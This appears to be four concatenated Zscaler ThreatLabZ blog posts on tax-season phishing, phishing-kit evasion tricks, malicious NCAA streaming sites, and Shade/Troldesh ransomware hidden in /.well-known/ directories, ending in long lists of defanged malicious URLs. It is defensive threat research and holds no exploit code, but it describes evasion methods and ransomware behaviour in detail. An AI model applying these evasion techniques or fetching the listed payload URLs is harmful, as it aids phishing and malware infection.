Tax time is here again and that means two things: writing big checks to Uncle Sam and, of course, a new season of tax scams brought to you by industrious and persistent malware authors. Americans feeling the rising panic of ensuring that they are squared up with the federal government before April 15 are searching for help online and downloading the financial statements they need for filing. The bad actors are counting on it and, as you read this, there's a high probability that somewhere in your inbox is a link to a scam attempting to collect sensitive information from you. The IRS has been warning people about some of the tax scams this season using its annual “Dirty Dozen” compilation of phishing and online scams. Of the following scenarios, which do you think is more likely? Will you be phished by a dodgy-looking IRS website, or will you get phished by a bogus financial website? Here at Zscaler, the ThreatLabZ research team has been monitoring such traffic and we've seen an increase in attempted generic phishing attacks posing as financial institutions. This trend makes sense because tax preparation usually means getting tax documents from several different financial institutions—your bank, your mortgage holder, your retirement and investment accounts, and so on. The following figure depicts financial and tax refund phishing events observed in the Zscaler cloud over the past two months. Figure 1: Financial (gold) and tax refund (green) phishing events over the past two months "IRS Login" phishing Though the majority of phishing sites were for "generic" financial institutions, we did see IRS phishing websites, including the following, which asks the user to enter an email address and then redirects to verify the account and fill in additional information including Social Security Number. Figure 2: IRS Phishing – Login page   Figure 3: IRS Phishing – Personal and SSN details   Fake “Apply for EIN” scam and Google SEO poisoning An EIN (Employer Identification Number) is a Federal Tax ID number required by businesses or other entities to file taxes. Required persons/entities can apply for an EIN on the IRS website and can get it immediately at no cost. Scammers have been active out there, attempting to phish unsuspecting users of their information and money by advertising themselves as experts in filing for Tax IDs. A Google search of “irs tax id” resulted in multiple scamming websites among the top ads. Figure 4: Google search results for IRS Tax ID showing ads for scamming websites   We noticed a few of these sites, such as irs-tax-id[.]com, gov-irs-ein[.]co, and irs-ein-tax[.]com, using the same phishing template for their homepage, which you can see in the image below. ​   Figure 5: “Apply for EIN” phishing template used by multiple sites   Figure 6: Phishing page requesting personal information including SSN   Figure 7: Phishing page requesting credit card information   Here are a few of the domains that are active in luring users to apply for an Employer Identification Number (EIN). Figure 8: “Apply for EIN” phishing domains   Tax refund phishing campaign – UK Tax year in the UK has just ended (April 6) and scammers have been preparing to take advantage of users seeking their refunds. One of the phishing domains we have been monitoring, hmrc[.]co[.]uk[.]pendingrefund[.]tk, updated its phishing pages on April 6 to keep up with tax season events. It began with a refund claim form and was changed to a form for "processing" the claim and applying it to the user's credit card. Phishing campaign observed before April 6: Page 1: start.php requesting name and address Page 2: claim_details.php displaying the information entered in start.php and fake amount Page 3: details.php requesting detailed personal information and credit card details   Figure 9: Phishing pages observed before April 6, 2019   And the current page (Tax-Refund.php) served by the phishing website (starting April 6) can be seen in the below image: Figure 10: Phishing page observed on April 6, 2019   Malware campaign The IRS has warned about a “Tax Transcript” email scam used by attackers to distribute malicious documents containing malware. ThreatLabZ has also noticed tax-themed malicious documents delivering Emotet and Nymiam malware, which are well-known Trojans used for stealing data and credentials, among other malicious functions. The following is the report of a recent Nymiam malware sample observed in the Zscaler Cloud Sandbox and delivered through a malicious URL: djaccounting[.]tax/wp-admin/98-14691361298-580222944834109973.zip Figure 11: Cloud Sandbox Report for Nymiam malware sample: 7B80A64E9A106806EE4F62A16A968661   Conclusion Every year during tax season, our researchers identify various kinds of phishing campaigns performing tax-related social engineering tactics in an attempt to collect sensitive information from unsuspecting users. You can read about some of the phishing campaigns that we observed during last year’s tax season here. The IRS has also been alerting tax filers about active tax scams and providing guidelines for safely filing taxes. At ThreatLabZ, we have been actively monitoring the latest tax scam campaigns and providing protection for Zscaler customers.  

Gone are the days when a phishing page was a single page designed to capture user credentials. Phishing kits have become sophisticated and advanced to evade detection and look more legitimate to the user. In this blog, we will discuss some of the latest evasive and anti-analysis techniques used by these phishing kits.   Techniques to make phishing pages look more legitimate 1. Verification of payment card number before accepting Many phishing campaigns related to banking, online shopping, or account upgrades ask victims to provide payment details to complete their online transactions. In such cases, most of the phishing campaigns simply check the length of the card number (debit or credit) provided by the victim and restrict them to 16 digits to prevent random details from being entered. In some cases, attackers go one step further, using online verification services to ensure that the victim enters the correct payment information. The information about the institution that issued a particular card can be checked with the initial six or eight digits of the card number, which is called an Issuer Identification Number (IIN). Many online services provide APIs to check the IIN of a card. The screenshot below shows one such case. Fig. 1: Request to check IIN information of the payment card number shown in the source code  2. Changing the language of phishing content based on victim’s geo-location Most phishing campaigns are designed in one language based on the probable victims of the attack. Such phishing pages only work in a particular region or country according to the language it is designed in. Like legitimate websites that are often "localized," there are a few phishing campaigns that instead of using one language deliver phishing content based on the geographical location of the victim, determined after the victim’s IP is checked. Below is one such campaign which first checks the victim’s geo-location; all the main strings in the phishing page are variable with values that depend on geo-location. Fig. 2: The main heading variable on the phishing page Fig. 3: Values of the phishing page title, heading, and submit button based on geo-location   Evasion and anti-analysis techniques 1. One-time access to the phishing page We have seen instances where phishing pages are accessible only once; upon re-visiting the page, it redirects the user to other websites. Below is one such campaign. Fig. 4: The victim's IP address is logged after checking if it is the first visit Fig. 5: File onetime.dat store log of all victims’ IP addresses Fig. 6: A victim's IP address is checked against the IP address in the file onetime.dat When a client visits phishing pages, such as the one discussed above, the IP address of the client gets logged in a file on the first visit. Each time a client visits such phishing pages, the client’s IP address gets checked against the list of IPs of clients that previously visited. Based on the results of that check, access to the phishing page is either granted, results in a “Page not found” message, or the client may be redirected to other websites.   2. Proxy check using online services Recently, many phishing kits have included a hardcoded list of blacklisted IP addresses, user-agents, and hostnames known to be used by security researchers and security companies. If the client attempts to connect with a blacklisted IP or user-agent, the phishing content will not be served. In some cases, along with the list of hardcoded IP addresses, the client’s IP is checked using some online services to see whether or not it is a proxy. Fig. 7: Source code using an online service to check the client's IP address for a proxy   Fig. 8: Phishing page for the above-discussed campaign   3. Creating a new random name directory on each visit To make it more difficult to detect phishing campaigns, some campaigns create a new random name directory each time and the phishing page is hosted on this random directory. Below is the analysis of one such campaign. Fig. 9. Random name directory is shown on a phishing page Fig. 10: Newly created random name directory in a web server Fig. 11: Source code to generate a random name directory on each visit   4. Creating a new random name file on each visit A few phishing kits were found to be creating a new random name file on each visit to make it difficult to identify as a phishing site. Below is the analysis of one such phishing kit. Fig. 12: Random name file in URL is shown on a phishing page Fig. 13: Source code to generate a random name file on each visit   5. Random values for HTML attributes on each visit To make a phishing page hard to analyze and detect, the page values of HTML attributes are generated randomly upon each visit, as shown in the phishing campaign depicted below.  Fig. 14: Randomly created values for HTML attributes Fig. 15: Source code to generate random values for HTML attributes Fig. 16: Phishing page related to the above-discussed campaign   Conclusion Phishing attacks have been on the rise for a few years, but we’re seeing changes in attackers’ methodologies. As end-users become more careful about clicking suspicious links or opening unknown attachments, attackers have also upped the ante by evolving the way in which the phishing content is delivered, and they’re leveraging new tactics to make the phishing pages remain undetected for longer periods. Zscaler ThreatLabZ actively tracks new and evolving phishing campaigns and protects customers from these types of attacks.  

Last week, 64 of the best men's college basketball teams (68 if you count the First Four games) began their quest to cut down the nets in Minneapolis on April 8. Since the opening day of the NCAA men's college basketball tournament isn’t a national holiday, most fans were likely at work when the tournament tipped off. But, that shouldn’t stop them from seeing their alma mater try to upset a national powerhouse or watching a No. 12 seed knock off a No. 5 seed. Thankfully, fans can stream the whole tournament through the CBS Sports website. ZscalerTM ThreatLabZ noticed increased activity on sports and media sites during the games on the Zscaler cloud platform. However, IT managers or productivity hounds need not panic and pull the curtain on this viewing activity. There are very good reasons to consider allowing your diligent and fanatic workers a chance to cheer for their team (or just to earn some side hustle on the office bracket challenge pool). The most important reason being that blocking official streams sends users elsewhere to watch unofficial streams. These unofficial streams can lead to very real security incidents if left unchecked.                          Figure 1: Sports streaming media during NCAA Tournament​ for the past 10 days.   Figure 1 shows just a portion of the traffic observed by the Zscaler Cloud that is generated by streaming services during the tournament. A steady flow can be seen as far as transaction count goes, but the highlight is the total volume of bytes, which peaks at 12.35 TB/per hour at one point. There is so much interest in the first round of the NCAA tournament that it is better to just allow streaming from legitimate sites if your internal infrastructure can support the load. Figure 2 shows the top official streaming sites that were visited across the Zscaler cloud in past week for NCAA games. Blocking this activity might lead a portion of the viewership looking for alternative sites with less-respectable online reputations.                                               Figure 2: Top sites accessed for NCAA Tournament streaming. To see just how bad it can get out there, the ThreatLabZ team did an analysis of some attacks seen while searching for unofficial NCAA streams. What we found was a series of adware installers, phishing attacks and fraudulent security warnings leading to malicious browser plugins. Searching for "ncaa live stream free" in Google resulted in multiple phishing links in the top 50 results.                                              Figure 3: An adware/phishing link in the top 50 Google search results.   Adware/phishing scams One of the malicious streaming sites that we came across, streamcartel[.]org, is laced with adware on almost each of its pages. When the visitor clicks anywhere on the page or attempts to close the ad, a new tab opens up, prompting the user to install of a fake browser extension.                                Figure 4: Streamcartel[.]org's NBA schedule page displaying a fake plugin ad.   According to information from Whois, sawlive[.]tv was registered one year ago during the NCAA tournament. It also uses other sporting events for enticing users to visit the site. One of the malicious ads from the site redirects to a Windows fake security warning page.                                Figure 5: Fake security warning ad/page from Microsoft Windows Firewall.   The goal of this adware site or of any other is to make money by delivering unwanted ads to the user. In addition to that, this site also has a PayPal donation link asking visitors to donate money.                                  Figure 6: PayPal donation page for owls0071@hotmail.com (in Dutch). Behind the scenes The site is embedded with player/content from sawlive[.]tv, which delivers more adware. These sites serve JavaScript obfuscated using JSF*ck, an encoding mechanism that uses only six characters to express any character. Here, 5,518 characters were sent as part of a response and, when deobfuscated, resulted into only 10 characters (“sawlive[.]tv”).                                      Figure 7: JavaScript obfuscated using JSF*ck, served by sawlive[.]tv.   This obfuscated JavaScript redirects to a request where the malicious server responds with more obfuscated JavaScript.                            Figure 8: Another cycle of obfuscated JavaScript served by the malicious site.   Whenever the user attempts to click or close the ad, a new browser tab is opened with a request to http[:]//www[.]adexchangecloud[.]com/jump/next[.]php?r=44011, which prompts the user to install a fake browser plugin or scareware alerts or additional adware. One of the ads redirects to fake “Adobe Flash Player” update as shown below:                                                                  Figure 8: Fake “Adobe Flash Player” update ad. The download/installer is flagged as malicious by our Zscaler Cloud Sandbox and also by VirusTotal.                                         Figure 9: Zscaler Cloud Sandbox report for “Fake Flash Player”.   Typo-squatted domains As part of every phishing/scam campaign that abuses current trends/keywords, there are typo-squatted domains for terms associated with the NCAA tournament. Here are a few domains that have been registered in the past 10 days: marchmadnessresults[.]com watchmarchmadnesslive[.]com betmarchmadness[.]fan marchmadness[.]mba marchmadness[.]rocks   Conclusion The NCAA tournament is a massive draw for users around the nation. Taking a measured approach to how it is handled is critical for all businesses. The examples laid out should highlight the diversity of threats that attempt to exploit the excitement around the NCAA tournament. We encourage readers to exercise caution when doing searches or clicking on links related to streaming the tournament. Zscaler ThreatLabZ continuously monitors online activity worldwide to ensure that Zscaler customers are protected from threats, even if they become tricked into clicking a nefarious link.   IoCs adexchangecloud[.]com adexchangemachine[.]com go[.]onclasrv[.]com gsafe[.]getawesome1[.]com inter1ads[.]com onclickmega[.]com sawlive[.]tv tgun[.]tv urldelivery[.]com - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Chris Mannon and Krishna Kona are Sr. Security Researchers at Zscaler.

WordPress and Joomla are among the most popular Content Management Systems (CMSs). They have also become popular for malicious actors, as cybercriminals target sites on these platforms for hacking and injecting malicious content. During the past few weeks, ThreatLabZ researchers have detected several WordPress and Joomla sites that were serving Shade/Troldesh ransomware, backdoors, redirectors, and a variety of phishing pages. The most well-known threats to CMS sites are the result of vulnerabilities introduced by plugins, themes, and extensions. In this blog, we are focusing on the Shade/Troldesh ransomware and phishing pages that we detected last month from several hundred compromised CMS sites. Shade ransomware has been quite active in the wild and we have been seeing a number of compromised WordPress and Joomla sites being used to spread the ransomware. The compromised WordPress sites we have seen are using versions 4.8.9 to 5.1.1 and they use SSL certificates issued by Automatic Certificate Management Environment (ACME)-driven certificate authorities, such as Let’s Encrypt, GlobalSign, cPanel, and DigiCert, among others. These compromised WordPress sites may have outdated CMS plugins/themes or server-side software which potentially could also be the reason for the compromise. Fig 1: Hits of Shade and phishing in detected CMS sites During the past month, our cloud blocked transactions for compromised WordPress and Joomla due to Shade ransomware payloads (13.6 percent) and phishing pages (27.6 percent), with the remaining blocks due to coinminers, adware, and malicious redirectors. We have been monitoring the compromised HTTPS sites for a few weeks and have noticed that attackers are favoring a well-known hidden directory present on the HTTPS website for storing and distributing Shade ransomware and phishing pages. The hidden /.well-known/ directory in a website is a URI prefix for well-known locations defined by IETF and commonly used to demonstrate ownership of a domain. The administrators of HTTPS websites that use ACME to manage SSL certificates place a unique token inside the /.well-known/acme-challenge/ or /.well-known/pki-validation/ directories to show the certificate authority (CA) that they control the domain. The CA will send them specific code for an HTML page that must be located in this particular directory. The CA will then scan for this code to validate the domain. The attackers use these locations to hide malware and phishing pages from the administrators. The tactic is effective because this directory is already present on most HTTPS sites and is hidden, which increases the life of the malicious/phishing content on the compromised site. The different types of threats that we found under the hidden directory in the past month are shown in the below image. Fig 2: Threats in hidden directory Fig 3: Shade ransomware vs. phishing pages in the hidden directory   Case I: Shade/Troldesh ransomware under the hidden directory   The graph below shows the Shade/Troldesh ransomware under the hidden directory that we detected last month. Fig 4: Shade/Troldesh ransomware hits over one month In the case of Shade/Troldesh ransomware, every compromised site has three types of files: HTML, ZIP, and EXE (.jpg), as shown below. Fig 5: Shade in hidden SSL validation directory inst.htm and thn.htm are HTML files that redirect to download ZIP files. reso.zip, rolf.zip, and stroi-invest.zip are ZIP files that contain the JavaScript file. msg.jpg and msges.jpg are EXE files that are the Shade ransomware. Fig 6: Shade Infection chain Troldesh is typically spread by malspam with a ZIP attachment or a link to an HTML redirector page, which downloads the ZIP file. The malspam pretends to be an order update coming from a Russian organization. An example of an email that has the link of the HTML redirector is shown below. Fig: 7 Malspam mail   Fig 8: Redirector to download ZIP The ZIP file contains only the JavaScript file with a Russian name. The JavaScript is highly obfuscated and encrypted strings are decrypted at runtime by the below function. Fig 9: Decryption function After decryption, the JavaScript has the functionalities shown below. It tries to connect one of the two URLs, downloads the payload in %TEMP%, and executes it. Fig 10: Simplified JavaScript code The downloaded payload is the new variant of Shade/Troldesh ransomware, which has been around since 2014. It has two layers of packers: custom and UPX. After unpacking, it saves its configurations in “HKEY_LOCAL_MACHINE\SOFTWARE\System32\Configuration”. Fig 11: Shade configuration xcnt = Count of encrypted files xi = ID of infected machine xpk = RSA public key for encryption xVersion = Version of current Shade ransomware The command-and-control (C&C) server is a4ad4ip2xzclh6fd[.]onion. It drops a TOR client in %TEMP% to connect to its C&C server. For each file, the file content and file name are encrypted with AES-256 in CBC mode with two different keys. After encryption, it changes the filename to BASE64(AES(file_name)).ID_of_infected_machine.crypted000007. Fig 12: Encrypted files It drops a copy of itself in %ProgramData%\Windows\csrss.exe and makes a run entry for this copy with the name “BurnAware.” It drops README1.txt to README10.txt on the desktop and changes the wallpaper as shown below. Fig 13: Shade wallpaper README.txt has ransom note in both Russian and English languages. Fig 14: Shade ransom note Fig 15: Zscaler sandbox report for Shade/Troldesh ransomware   Case II: Phishing pages under the hidden directory The graph below shows the different types of phishing pages under the hidden directory that we detected last month. Fig 16: Phishing hits over one month The phishing pages we have seen up to this point, which are hosted under SSL-validated hidden directories, are related to Office 365, Microsoft, DHL, Dropbox, Bank of America, Yahoo, Gmail, and others. Fig 17: OneDrive phishing page Fig 18: Yahoo phishing page Fig 19: DHL phishing page   IOCs: aioshipping[.]com/.well-known/acme-challenge/msg.jpg yourcurrencyrates[.]com/.well-known/pki-validation/mxr.pdf rangtrangxinh[.]vn/.well-known/acme-challenge/msg.jpg judge[.]education/.well-known/pki-validation/ssj.jpg hoadaklak[.]com/.well-known/acme-challenge/ssj.jpg nguyenlinh[.]vn/.well-known/acme-challenge/msg.jpg rdsis[.]in/.well-known/pki-validation/msg.jpg khanlanhdaklak[.]com/.well-known/acme-challenge/ssj.jpg presse[.]schmutzki.de:80/.well-known/acme-challenge/messg.jpg aioshipping[.]com:80/.well-known/acme-challenge/msg.jpg yourcurrencyrates[.]com:80/.well-known/pki-validation/mxr.pdf vinhomeshalongxanh[.]xyz:80/.well-known/pki-validation/ssj.jpg titusrealestate[.]com.fj:80/.well-known/pki-validation/msg.jpg dichvucong[.]vn:80/.well-known/acme-challenge/msg.jpg myphamnarguerite[.]com:80/.well-known/acme-challenge/mxr.pdf minifyurl[.]net:80/.well-known/pki-validation/mxr.pdf judge[.]education:80/.well-known/pki-validation/ssj.jpg minifyurl[.]net/.well-known/pki-validation/mxr.pdf neccotweethearts[.]com:80/.well-known/pki-validation/mxr.pdf backuptest[.]tomward.org.uk:80/.well-known/pki-validation/ssj.jpg mobshop[.]schmutzki.de:80/.well-known/acme-challenge/messg.jpg neccotweethearts[.]com/.well-known/pki-validation/mxr.pdf myphamnarguerite[.]com/.well-known/acme-challenge/mxr.pdf khanlanhdaklak[.]com:80/.well-known/acme-challenge/ssj.jpg presse[.]schmutzki.de/.well-known/acme-challenge/messg.jpg mobshop[.]schmutzki.de/.well-known/acme-challenge/messg.jpg globalkabar[.]com/.well-known/pki-validation/sserv.jpg ereservices[.]com:80/.well-known/pki-validation/ssj.jpg dulichvietlao[.]vn:80/.well-known/acme-challenge/ssj.jpg backuptest[.]tomward.org.uk/.well-known/pki-validation/ssj.jpg mamycloth[.]store:80/.well-known/acme-challenge/msg.jpg business[.]driverclub.co:80/.well-known/pki-validation/msg.jpg vinhomeshalongxanh[.]xyz/.well-known/pki-validation/ssj.jpg dichvucong[.]vn/.well-known/acme-challenge/msg.jpg thuducland[.]net/.well-known/acme-challenge/sserv.jpg sahabathasyim[.]com/.well-known/acme-challenge/sserv.jpg rangtrangxinh[.]vn:80/.well-known/acme-challenge/msg.jpg lovecookingshop[.]com:80/.well-known/pki-validation/ssj.jpg ereservices[.]com/.well-known/pki-validation/ssj.jpg hoadaklak[.]com:80/.well-known/acme-challenge/ssj.jpg ceroshop[.]net/.well-known/acme-challenge/nba1.jpg thuducland[.]net:80/.well-known/acme-challenge/sserv.jpg lovecookingshop[.]com/.well-known/pki-validation/ssj.jpg entrenadorpersonalterrassa[.]com.es:80/.well-known/acme-challenge/mxr.pdf epifaniacr[.]net:80/.well-known/pki-validation/ssj.jpg titusrealestate[.]com.fj/.well-known/pki-validation/msg.jpg globalkabar[.]com:80/.well-known/pki-validation/sserv.jpg sahabathasyim[.]com:80/.well-known/acme-challenge/sserv.jpg dulichvietlao[.]vn/.well-known/acme-challenge/ssj.jpg argfoodfest[.]e-zero.com.ar:80/.well-known/pki-validation/ssj.jpg aa[-]publisher.com:80/.well-known/mxr.pdf duandojiland[-]sapphire.com:80/.well-known/pki-validation/ssj.jpg master[-]of-bitcoin.net/.well-known/pki-validation/messg.jpg ea[-]no7.net/.well-known/pki-validation/messg.jpg tropictowersfiji[.]com/.well-known/pki-validation/msg.jpg test[.]digimarkting.com/.well-known/pki-validation/msges.jpg tebarameatsfiji[.]com/.well-known/pki-validation/msg.jpg sbs[.]ipeary.com/.well-known/pki-validation/msges.jpg sbs[.]ipeary.com/.well-known/pki-validation/msg.jpg samyaksolution[.]co.in/.well-known/pki-validation/msges.jpg samyaksolution[.]co.in/.well-known/pki-validation/msg.jpg rosyheartsfiji[.]com/.well-known/pki-validation/pik.zip needcareers[.]com/.well-known/pki-validation/msges.jpg natristhub[.]club/.well-known/pki-validation/msges.jpg natristhub[.]club/.well-known/pki-validation/msg.jpg mytripland[.]com:80/.well-known/pki-validation/sserv.jpg learning[.]ipeary.com/.well-known/pki-validation/msg.jpg ipeari[.]com/.well-known/pki-validation/msg.jpg diennangmattroi[.]com/.well-known/pki-validation/msges.jpg diennangmattroi[.]com/.well-known/pki-validation/msg.jpg alonhadat24h[.]vn/.well-known/acme-challenge/update_2018_02.browser-components.zip 24bizhub[.]com/.well-known/pki-validation/msges.jpg 24bizhub[.]com/.well-known/pki-validation/msg.jpg thinkmonochrome[.]co.uk/.well-known/acme-challenge/messg.jpg test[.]digimarkting.com/.well-known/pki-validation/msg.jpg needcareers[.]com/.well-known/pki-validation/msg.jpg hanggiadungduc[.]vn/.well-known/acme-challenge/reso.zip designitpro[.]net/.well-known/acme-challenge/msg.jpg zanatika[.]com:80/.well-known/acme-challenge/ssj.jpg vina[.]fun:80/.well-known/acme-challenge/ssj.jpg nexusdental[.]com.mx/.well-known/acme-challenge/ssj.jpg neccotweethearts[.]com:80/.well-known/pki-validation/ssj.jpg jayc[-]productions.com:80/.well-known/acme-challenge/ssj.jpg indochine[-]mekong.com:80/.well-known/acme-challenge/ssj.jpg hexamersolution[.]com/.well-known/acme-challenge/msg.jpg hexacode[.]lk:80/.well-known/acme-challenge/ssj.jpg dongha[.]city:80/.well-known/acme-challenge/ssj.jpg domika[.]vn/.well-known/acme-challenge/msg.jpg coupanadda[.]in:80/.well-known/pki-validation/ssj.jpg choviahe[.]cf:80/.well-known/acme-challenge/ssj.jpg brace[-]dd.com/.well-known/pki-validation/msg.jpg angkaprediksi[.]fun/.well-known/acme-challenge/msg.jpg advancitinc[.]com/.well-known/pki-validation/msg.jpg vodai[.]bid/.well-known/pki-validation/ssj.jpg thucphammena[.]com/.well-known/acme-challenge/ssj.jpg thefoodgram[.]com/.well-known/acme-challenge/tehnikol.zip thefoodgram[.]com/.well-known/acme-challenge/stroi-industr.zip shopkimhuyen[.]com/.well-known/acme-challenge/msg.jpg shine[.]bmt.city/.well-known/acme-challenge/ssj.jpg sbs[.]ipeary.com/.well-known/pki-validation/stroi-industr.zip needcareers[.]com/.well-known/pki-validation/tehnikol.zip needcareers[.]com/.well-known/pki-validation/stroi-industr.zip maithanhduong[.]com/.well-known/pki-validation/pik.zip luongynhiem[.]com/.well-known/pki-validation/gkpik.zip lichxuansaigon[.]com:80/.well-known/acme-challenge/ssj.jpg kinder[-]express.de/.well-known/acme-challenge/reso.zip khannen[.]com.vn/.well-known/acme-challenge/ssj.jpg jayc[-]productions.com/.well-known/acme-challenge/ssj.jpg jambanswers[.]org/.well-known/pki-validation/ssj.jpg intercontinentalglobalservice[.]com:80/.well-known/pki-validation/ssj.jpg gurusexpo[.]com.ng/.well-known/pki-validation/ssj.jpg gotrungtuan[.]online/.well-known/acme-challenge/ssj.jpg goindelivery[.]com/.well-known/pki-validation/major.zip fernandoherrera[.]me:80/.well-known/acme-challenge/ssj.jpg diennangmattroi[.]com/.well-known/pki-validation/stroi-industr.zip canhooceangate[.]com/.well-known/acme-challenge/sserv.jpg bramptonpharmacy[.]ca/.well-known/acme-challenge/msg.jpg bolt[-]fast.com/.well-known/pki-validation/gkpik.zip bmt[.]today/.well-known/acme-challenge/ssj.jpg blog[.]ponta-fukui.com/.well-known/pki-validation/pik.zip bhartivaish[.]com:80/.well-known/acme-challenge/ssj.jpg attireup[.]com/.well-known/acme-challenge/tehnikol.zip attireup[.]com/.well-known/acme-challenge/stroi-industr.zip acreationevents[.]com/.well-known/acme-challenge/msg.jpg yeu82[.]com/.well-known/acme-challenge/ssj.jpg yeu81[.]com/.well-known/acme-challenge/ssj.jpg yeu49[.]com/.well-known/acme-challenge/ssj.jpg yeu48[.]com/.well-known/acme-challenge/ssj.jpg vuacacao[.]com/.well-known/acme-challenge/ssj.jpg vision[-]ex.de/.well-known/acme-challenge/reso.zip vinaykhatri[.]in/.well-known/acme-challenge/ssj.jpg vinaykhatri[.]in/.well-known/acme-challenge/mxr.pdf variantmag[.]com/.well-known/acme-challenge/sserv.jpg valentinesblues[.]com/.well-known/pki-validation/sserv.jpg uyencometics[.]bmt.city/.well-known/acme-challenge/ssj.jpg tysonfury[.]rocks/.well-known/acme-challenge/msg.jpg tulipremodeling[.]com/.well-known/acme-challenge/sserv.jpg tropictowersfiji[.]com/.well-known/pki-validation/pik.zip thesaturnring[.]com/.well-known/acme-challenge/mxr.pdf theotokis[.]gr/.well-known/pki-validation/mxr.pdf thefashionelan[.]com/.well-known/pki-validation/msg.jpg tanione[.]com:80/.well-known/acme-challenge/ssj.jpg tanione[.]com/.well-known/acme-challenge/ssj.jpg steeveriano[.]com/.well-known/pki-validation/msg.jpg singleparentaustralia[.]com.au/.well-known/pki-validation/reso.zip shafercharacter[.]org/.well-known/acme-challenge/messg.jpg service[.]baynuri.net/.well-known/acme-challenge/messg.jpg samyaksolution[.]co.in/.well-known/pki-validation/rolf.zip realman[.]work/.well-known/acme-challenge/reso.zip rarejewelry[.]net/.well-known/acme-challenge/mxr.pdf rarejewelry[.]net/.well-known/acme-challenge/messg.jpg qsongchihotel[.]com/.well-known/acme-challenge/ssj.jpg panama[.]driverclub.co/.well-known/pki-validation/pic.zip ngheve[.]com/.well-known/acme-challenge/ssj.jpg nfc[.]com.vn/.well-known/acme-challenge/msg.jpg next[-]vision.ro/.well-known/pki-validation/ssj.jpg newsnaija[.]ng/.well-known/pki-validation/ssj.jpg newsnaija[.]ng/.well-known/pki-validation/mxr.pdf neelshivamlaw[.]com/.well-known/pki-validation/pic.inform.zip neccotweethearts[.]com/.well-known/pki-validation/ssj.jpg navegacaolacet[.]com.br/.well-known/acme-challenge/msg.jpg mytripland[.]com/.well-known/pki-validation/ssj.jpg myschoolmarket[.]com.ng/.well-known/acme-challenge/ssj.jpg mskhangroup[.]com/.well-known/pki-validation/pic.zip mskhangroup[.]com/.well-known/pki-validation/msg.jpg morganbits[.]com/.well-known/acme-challenge/mxr.pdf mo7o[.]fun:80/.well-known/acme-challenge/mxr.pdf mitsubishidn[.]com.vn/.well-known/acme-challenge/sserv.jpg meliscar[.]com:80/.well-known/pki-validation/ssj.jpg meliscar[.]com/.well-known/pki-validation/ssj.jpg manhattan[.]dangcaphoanggia.com/.well-known/acme-challenge/mxr.pdf maithanhduong[.]com/.well-known/pki-validation/msg.jpg lichxuansaigon[.]com/.well-known/acme-challenge/ssj.jpg lemon[-]remodeling.com/.well-known/acme-challenge/sserv.jpg lastra[.]top/.well-known/pki-validation/msg.jpg laflamme[-]heli.com/.well-known/acme-challenge/ssj.jpg laflamme[-]heli.com/.well-known/acme-challenge/sserv.jpg kousen[.]fire-navi.jp/.well-known/pki-validation/msg.jpg jambanswers[.]org/.well-known/pki-validation/vseros.bank.zakaz.docx.zip integramultimedia[.]com.mx/.well-known/acme-challenge/ssj.jpg incgoin[.]com/.well-known/pki-validation/reso.zip hexacode[.]lk/.well-known/acme-challenge/ssj.jpg happysungroup[.]de/.well-known/pki-validation/ssj.jpg goindelivery[.]com/.well-known/pki-validation/reso.zip goindelivery[.]com/.well-known/pki-validation/msg.jpg goindelivery[.]com/.well-known/pki-validation/kia.zip gnb[.]uz/.well-known/pki-validation/ssj.jpg geecee[.]co.za/.well-known/pki-validation/msg.jpg geecee[.]co.za/.well-known/pki-validation/kia.zip gdn[.]segera.live/.well-known/pki-validation/sserv.jpg fijidirectoryonline[.]com/.well-known/pki-validation/msg.jpg fastimmo[.]fr/.well-known/acme-challenge/sserv.jpg ereservices[.]com/.well-known/pki-validation/sserv.jpg ede[.]coffee/.well-known/acme-challenge/ssj.jpg dongydaisinhduong[.]com/.well-known/acme-challenge/messg.jpg diota[-]ar.com:80/.well-known/acme-challenge/mxr.pdf diota[-]ar.com/.well-known/acme-challenge/mxr.pdf diamondking[.]co/.well-known/pki-validation/sserv.jpg dev01[.]europeanexperts.com/.well-known/pki-validation/messg.jpg designitpro[.]net/.well-known/acme-challenge/reso.zip damuoigiasi[.]com/.well-known/acme-challenge/ssj.jpg dailynow[.]vn/.well-known/acme-challenge/msg.jpg choviahe[.]cf/.well-known/acme-challenge/ssj.jpg cellulosic[.]logicalatdemo.co.in/.well-known/pki-validation/ssj.jpg business[.]driverclub.co/.well-known/pki-validation/msg.jpg bhartivaish[.]com/.well-known/acme-challenge/sserv.jpg bcspremier[.]ru/promo/well-known/images/background_sm.jpg bcspremier[.]ru/promo/well-known/images/background_lg.jpg atiqah[.]my/.well-known/pki-validation/sserv.jpg aanarehabcenter[.]com:80/.well-known/pki-validation/ssj.jpg aanarehabcenter[.]com/.well-known/pki-validation/ssj.jpg 24bizhub[.]com/.well-known/pki-validation/tehnikol.zip 24bizhub[.]com/.well-known/pki-validation/stroi-industr.zip ipeari[.]com/.well-known/pki-validation/msg.jpg ipeari[.]com/.well-known/pki-validation/reso.zip ipeari[.]com/.well-known/pki-validation/stroi-industr.zip ipeari[.]com/.well-known/pki-validation/stroi-invest.zip ipeari[.]com/.well-known/pki-validation/tehnikol.zip learning[.]ipeary.com/.well-known/pki-validation/msg.jpg learning[.]ipeary.com/.well-known/pki-validation/reso.zip learning[.]ipeary.com/.well-known/pki-validation/stroi-industr.zip learning[.]ipeary.com/.well-known/pki-validation/stroi-invest.zip learning[.]ipeary.com/.well-known/pki-validation/tehnikol.zip test[.]digimarkting.com/.well-known/pki-validation/msg.jpg test[.]digimarkting.com/.well-known/pki-validation/reso.zip test[.]digimarkting.com/.well-known/pki-validation/stroi-industr.zip test[.]digimarkting.com/.well-known/pki-validation/stroi-invest.zip test[.]digimarkting.com/.well-known/pki-validation/tehnikol.zip SBS[.]ipeary.com/.well-known/pki-validation/msg.jpg SBS[.]ipeary.com/.well-known/pki-validation/reso.zip SBS[.]ipeary.com/.well-known/pki-validation/stroi-industr.zip SBS[.]ipeary.com/.well-known/pki-validation/stroi-invest.zip SBS[.]ipeary.com/.well-known/pki-validation/tehnikol.zip singleparentaustralia[.]com.au/.well-known/pki-validation/msg.jpg singleparentaustralia[.]com.au/.well-known/pki-validation/reso.zip natristhub[.]club/.well-known/pki-validation/msg.jpg natristhub[.]club/.well-known/pki-validation/reso.zip natristhub[.]club/.well-known/pki-validation/stroi-industr.zip natristhub[.]club/.well-known/pki-validation/stroi-invest.zip natristhub[.]club/.well-known/pki-validation/tehnikol.zip natristhub[.]club/.well-known/pki-validation/tehnikol1.zip

